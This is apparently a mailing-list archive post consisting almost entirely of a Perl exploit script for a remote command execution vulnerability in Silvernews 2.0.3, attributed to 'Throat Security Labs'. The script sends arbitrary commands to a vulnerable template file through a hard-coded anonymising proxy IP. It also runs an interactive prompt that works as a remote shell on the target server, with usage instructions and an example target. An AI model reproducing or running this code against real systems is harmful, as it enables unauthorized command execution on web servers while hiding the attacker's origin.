<<< Date Index >>>     <<< Thread Index >>>

Silvernews 2.0.3 remote command execution exploit, proxy server support!



Exploit for the remote command execution vulnerability in Silvernews 2.0.3:
discovered by:
http://www.securityfocus.com/archive/1/407163/30/0/threaded

sploit:
--------



#!/usr/bin/perl

################TSL###########################################################
#
#
# SilverNews Exploit inlcuded Proxy Server Function
# THROAT SECURITY LABS
#
#  vuln:  http://www.target.com/templates/tpl_global.php?command=[command]
#
#
################TSL###########################################################

$l="\015\012";
$t=0;
my $sock;
my $target;
my $location;
my $command;
my $proxy;

#define your proxyserver:
$proxy = "200.186.217.122"; #brazil high anoynmity proxy

use IO::Socket;

sub sploit()
{

 $sock = IO::Socket::INET->new(PeerAddr => $proxy, PeerPort => 80,
 Proto => "tcp") or die "No Connection to Your ProxyServer: $proxy at Port 
80\n";

 print $sock "GET $target/$location/templates/tpl_global.php?command=$command 
HTTP/1.1$l";

 print $sock "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)$l";
 print $sock "Connection: close$l";

while (<$sock>) {

    if (/^HTTP\/1\.[0-2] ([0-9]{3}) .+$/ and $1 ne "200"){
        print "Error! Got HTTP return code $1. Exciting!\n";
        exit 1;

    }

    print if $t==1;
    $t=1 if /^$l$/;

 }

}

if (@ARGV != 2)

{

 print "\n*** by lizard for [T]hroat [S]ecurity [L]abs\n";
 print "-------------------------------------------------------\n\n";
 print "* usage:\t $0 [target] [path] \n";
 print "* example:\t $0 www.target.com newssystem \n";
 print "----\n\n\n pia s. i love you forever ;)\n\n";

} else {

 $target     = $ARGV[0];
 $location   = $ARGV[1];

 print "sending exploit ... please wait\n";
 sleep(1);

while(1){

   print "[sploit\@$target:/$location\] ";
   $_=<STDIN>;
   chop;
   next if /^$/;
   s/ /%20/;
   #if ($command=="exit") {exit} else {sploit()};
   $command=$_;
   sploit();

   }

}

#EOF#